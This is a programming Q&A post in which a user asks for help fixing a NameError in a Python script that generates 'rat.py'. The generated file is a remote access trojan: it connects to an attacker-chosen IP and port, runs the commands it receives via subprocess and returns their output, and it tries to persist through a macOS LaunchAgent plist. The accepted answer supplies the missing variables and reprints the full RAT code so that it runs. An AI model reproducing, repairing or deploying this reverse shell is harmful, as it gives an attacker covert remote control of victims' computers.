# name other_script is not defined

Tags: python, python-3.x

```
 def b():
 a = '"'
 other_python_script = f"""
 import socket
 import subprocess
 import os
 p = os.path.realpath(__file__)
 setsidrat = ("setsid python3", p)
 with open("systemfaster.sh", " w") as python_script_file:
     python_script_file.write(setsidrat)
 daemon = ("<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 <plist version="1.0">
 <dict>
     <key>Label</key>
     <string>com.example.exampled</string>
     <key>LaunchOnlyOnce</key>
         <true/>
     <key>ProgramArguments</key>
     <array>
         <string>/bin/bash</string>
         <string>absolute_path_to_script</string>

     </array>
 </dict>
 </plist>")
 with open("com.example.exampld.plist", "w") as python_script_file:
     python_script_file.write(l)
 os.system("Library/LaunchAgents/com.    example.exampld.plist")
 SERVER_HOST = {a}+{ip}+{a}
 SERVER_PORT = {port}
 BUFFER_SIZE = 1024")
 # create the socket object
 s = socket.socket()
 # connect to the server
 s.connect((SERVER_HOST, SERVER_PORT))
 while True:
     # receive the command from the server
     command = s.recv(BUFFER_SIZE).decode()
     if command.lower() == "exit":
         # if the command is exit, just break out   of the loop
         break
     # execute the command and retrieve the  results
     output = subprocess.getoutput(command)
     # send the results back to the server
     s.send(output.encode())
 # close client connection
 s.close()
 """
with open("rat.py", "w") as python_script_file:
 python_script_file.write(other_python_script)
```

I don't know what to do, I tried everything thing, but it says it is not defined, maybe it's formated wrong, but I don't know how to fix this issue, issue is on line 3,help please, and other answers don't work, I am using python3

Comment: The last two lines should be indented inside the function.

Answer (score 1, accepted):

You forgot to **define ip and port**, which are interpreted as variables by the string since they are between curly brackets.

```
def b():
    a = '"'
    ip = '"'
    port = '"'
    other_python_script = f"""
     import socket
     import subprocess
     import os
     p = os.path.realpath(__file__)
     setsidrat = ("setsid python3", p)
     with open("systemfaster.sh", " w") as python_script_file:
         python_script_file.write(setsidrat)
     daemon = ("<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
     <plist version="1.0">
     <dict>
         <key>Label</key>
         <string>com.example.exampled</string>
         <key>LaunchOnlyOnce</key>
             <true/>
         <key>ProgramArguments</key>
         <array>
             <string>/bin/bash</string>
             <string>absolute_path_to_script</string>

         </array>
     </dict>
     </plist>")
     with open("com.example.exampld.plist", "w") as python_script_file:
         python_script_file.write(l)
     os.system("Library/LaunchAgents/com.    example.exampld.plist")
     SERVER_HOST = {a}+{ip}+{a}
     SERVER_PORT = {port}
     BUFFER_SIZE = 1024")
     # create the socket object
     s = socket.socket()
     # connect to the server
     s.connect((SERVER_HOST, SERVER_PORT))
     while True:
         # receive the command from the server
         command = s.recv(BUFFER_SIZE).decode()
         if command.lower() == "exit":
             # if the command is exit, just break out   of the loop
             break
         # execute the command and retrieve the  results
         output = subprocess.getoutput(command)
         # send the results back to the server
         s.send(output.encode())
     # close client connection
     s.close()
     """

    with open("rat.py", "w") as python_script_file:
        python_script_file.write(other_python_script)
```

It works like this

Comment: Please, edit your question so that the indentation is preserved.